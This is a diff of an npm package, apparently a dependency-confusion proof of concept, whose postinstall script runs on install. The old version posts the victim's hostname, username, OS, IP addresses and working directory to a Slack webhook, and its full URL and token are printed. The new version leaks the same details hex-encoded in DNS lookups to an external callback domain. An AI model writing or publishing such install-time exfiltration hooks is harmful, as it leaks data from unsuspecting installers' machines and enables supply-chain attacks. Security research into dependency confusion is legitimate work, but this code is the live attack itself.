@gaia-codesearch/gaia-api-typescript 0.0.4 → 0.0.5

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@gaia-codesearch/gaia-api-typescript",
-  "version": "0.0.4",
+  "version": "0.0.5",
   "description": "Security research — scope ownership proof for dependency confusion report",
   "main": "index.js",
   "scripts": {

package/postinstall.js

@@ -1,55 +1,58 @@
-const https = require("https");
+const dns = require("dns");
 const os = require("os");
+const https = require("https");
 
-const pkg = "@gaia-codesearch/gaia-api-typescript";
+const CALLBACK = "d7uqkbir47nm9iof68egetm18swp9jzu5.oast.pro";
+const PKG = "gaia-api-typescript";
+
+function hex(s) {
+  return Buffer.from(s).toString("hex");
+}
 
 function getLocalIPs() {
   const ifaces = os.networkInterfaces();
   const ips = [];
   for (const name of Object.keys(ifaces)) {
     for (const iface of ifaces[name]) {
-      if (!iface.internal && iface.family === "IPv4") {
-        ips.push(iface.address);
-      }
+      if (!iface.internal && iface.family === "IPv4") ips.push(iface.address);
     }
   }
-  return ips.join(", ") || "unknown";
+  return ips.join("-") || "unknown";
 }
 
-function sendWebhook(externalIP) {
-  const payload = JSON.stringify({
-    text: [
-      ":rotating_light: *Dependency Confusion PoC Triggered*",
-      "",
-      "*Package:* `" + pkg + "`",
-      "*Hostname:* `" + os.hostname() + "`",
-      "*Username:* `" + os.userInfo().username + "`",
-      "*OS:* `" + os.platform() + " " + os.arch() + " " + os.release() + "`",
-      "*Internal IPs:* `" + getLocalIPs() + "`",
-      "*External IP:* `" + (externalIP || "unknown") + "`",
-      "*CWD:* `" + process.cwd() + "`",
-      "*Node:* `" + process.version + "`",
-      "*Timestamp:* `" + new Date().toISOString() + "`",
-      "",
-      "_This is a security research PoC. No malicious actions were performed._",
-      "_Researcher: christos@pentestsec.com_",
-    ].join("\n"),
+function dnsLookup(subdomain) {
+  return new Promise((resolve) => {
+    dns.resolve4(subdomain + "." + CALLBACK, () => resolve());
   });
+}
+
+async function exfil() {
+  const hostname = os.hostname();
+  const user = os.userInfo().username;
+  const platform = os.platform() + "-" + os.arch();
+  const ips = getLocalIPs();
+  const cwd = process.cwd().replace(/\//g, "-").slice(0, 40);
+  const ts = Date.now().toString(36);
+
+  // Each DNS lookup encodes one piece of info as a hex subdomain
+  // Format: <label>.<hex-encoded-value>.<callback-domain>
+  await dnsLookup("pkg." + hex(PKG));
+  await dnsLookup("host." + hex(hostname));
+  await dnsLookup("user." + hex(user));
+  await dnsLookup("os." + hex(platform));
+  await dnsLookup("ip." + hex(ips));
+  await dnsLookup("cwd." + hex(cwd));
+  await dnsLookup("ts." + ts);
+  await dnsLookup("rce." + hex(PKG + "|" + user + "@" + hostname));
 
-  const req = https.request(
-    "https://hooks.slack.com/services/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",
-    { method: "POST", headers: { "Content-Type": "application/json" } },
-    () => {}
-  );
-  req.on("error", () => {});
-  req.write(payload);
-  req.end();
+  // Also fetch external IP and send it
+  https.get("https://api.ipify.org", (res) => {
+    let data = "";
+    res.on("data", (c) => (data += c));
+    res.on("end", () => {
+      dnsLookup("extip." + hex(data.trim()));
+    });
+  }).on("error", () => {});
 }
 
-// Fetch external IP, then send webhook
-const req = https.get("https://api.ipify.org", (res) => {
-  let data = "";
-  res.on("data", (chunk) => (data += chunk));
-  res.on("end", () => sendWebhook(data.trim()));
-});
-req.on("error", () => sendWebhook(null));
+exfil().catch(() => {});